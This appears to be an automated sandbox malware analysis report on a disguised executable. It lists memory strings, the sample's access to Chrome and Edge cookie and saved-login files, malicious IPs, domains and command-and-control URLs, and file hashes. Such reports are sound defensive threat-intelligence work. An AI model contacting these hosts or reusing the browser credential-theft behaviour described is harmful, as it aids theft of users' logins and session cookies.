Source: cvSKtqilyhlQ.exe, 00000006.00000000.2198146201.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000006.00000002.3524900332.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000008.00000000.2343689945.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: cvSKtqilyhlQ.exe, 00000006.00000000.2198146201.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000006.00000002.3524900332.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000008.00000000.2343689945.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: cvSKtqilyhlQ.exe, 00000006.00000000.2198146201.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000006.00000002.3524900332.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000008.00000000.2343689945.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: cvSKtqilyhlQ.exe, 00000006.00000000.2198146201.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000006.00000002.3524900332.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000008.00000000.2343689945.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
160.25.166.123	www.rpa.asia	unknown	17676	GIGAINFRASoftbankBBCorpJP	true
47.83.1.90	www.givvjn.info	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	true
172.67.147.28	www.lugao.xyz	United States	13335	CLOUDFLARENETUS	true
104.21.83.145	www.littlecarseats.shop	United States	13335	CLOUDFLARENETUS	false
149.104.185.93	2xieerbi.dun899.com	United States	174	COGENT-174US	true
199.59.243.228	www.activeusers.tech	United States	395082	BODIS-NJUS	true
209.74.64.189	www.boldjourn.website	United States	31744	MULTIBAND-NEWHOPEUS	true
68.65.122.71	rtp189z.lat	United States	22612	NAMECHEAP-NETUS	true

Name	Malicious	Antivirus Detection	Reputation
http://www.rtp189z.lat/tt36/?BXc8V=7XRN4ZBNuxsgsz85WwF8d5RVD19EzJb4JnIab8u1JoWwH5zq0g0l+ZcBEWO33waNPxeiCBvzmGaSpdMTI8OJtChGzZiriz+EVcp1nviLXn5OzCwSP0UMhIk=&f898=D4YHodiH3rXTfZ	true	Avira URL Cloud: safe	unknown
http://www.activeusers.tech/s76m/?BXc8V=5+vWPd9X0wSWPJRdjPK4htAFucAo2VruY7NWHsZJjc93W8tV5J/CvgfDxHaReh/JOtz7+f35BLAy5HXA0CqVvOWOdVDklARjVuGkQkqqALzufSU8AevfCiY=&f898=D4YHodiH3rXTfZ	true	Avira URL Cloud: safe	unknown
http://www.oequ8s1l.vip/izrj/	true	Avira URL Cloud: safe	unknown
http://www.littlecarseats.shop/vngz/?BXc8V=BywAvqZrlXCPypxowigGU/RMQqJ+aFEu4r9fzmpnpak2vS64kVBA8ZUuc20d6AYdHHbV7T9IEXhUPkXJmH12l+9kSAAe2W5CHPw/a2fo9vOL4zfBkwpEEo8=&f898=D4YHodiH3rXTfZ	false	Avira URL Cloud: safe	unknown
http://www.boldjourn.website/6qnn/?BXc8V=jZjCtW5Z35UjZn8TZsrAhfuPzAvLvIn1UqsIYqvINL5GRqKd5l5cN7nY2f+SbBmC2WETDruk6ZGN6IqYT24Zv1a8PLIHAmXFEvfhPzClF16HpP7M54iZiSM=&f898=D4YHodiH3rXTfZ	true	Avira URL Cloud: safe	unknown
http://www.rpa.asia/5blw/	true	Avira URL Cloud: safe	unknown
http://www.givvjn.info/e4zw/?BXc8V=vBV+S5Q8h7Cl09PJqQteIVoPn0WMDxyCQPiiXTQrjiV2j0wk8nAmuATUOuyLShoOecv/N06oacatEhkR7UdQnNX8vYYfl5KO9EIWGMCepu/511PNPsKoGB8=&f898=D4YHodiH3rXTfZ	true	Avira URL Cloud: safe	unknown
http://www.lugao.xyz/qixh/?BXc8V=1RMEcCmOa+NBnL2H42a1any5QtiTZ5BG62LeNlaTxkSavmi+Sr/0k147vVBI8c7b7ZvrdBlJEtVahWNDtgmsFIs/6lOYP2MHU69GVvy+6ALSisvzm9a+ML0=&f898=D4YHodiH3rXTfZ	true	Avira URL Cloud: safe	unknown
http://www.lugao.xyz/qixh/	true	Avira URL Cloud: safe	unknown
http://www.oequ8s1l.vip/izrj/?f898=D4YHodiH3rXTfZ&BXc8V=j50sR9qwIfHSiYtxTFFp7g89UJFry+rQTe0kZ9YXVPGo3xxAz/jXuWZxuk+F1xvQPOoZdxLEIBdogShtQlOGjR8qYGUmJGoMkDNaZ33tU1jJrtqR7YIPhnQ=	true	Avira URL Cloud: safe	unknown
http://www.givvjn.info/e4zw/	true	Avira URL Cloud: safe	unknown
http://www.rtp189z.lat/tt36/	true	Avira URL Cloud: safe	unknown
http://www.activeusers.tech/s76m/	true	Avira URL Cloud: safe	unknown
http://www.boldjourn.website/6qnn/	true	Avira URL Cloud: safe	unknown

ID:	1592544
Product:	CloudBasic
Start time:	09:21:38
Start date:	16.01.2025
Sample:	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	6e482564396bb10f5afb4244e505c3e6
SHA1:	9564141dbcedfa4bfc2df6f789db0ab8bbffad99
SHA256:	8fe18e6c77d0b63ad58b669472c8247a8771c82ce4edc65814bb4c53fe5ab51c
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Temp\6p1225E	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3

Windows Analysis Report 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Malware Threat Intel
Provided by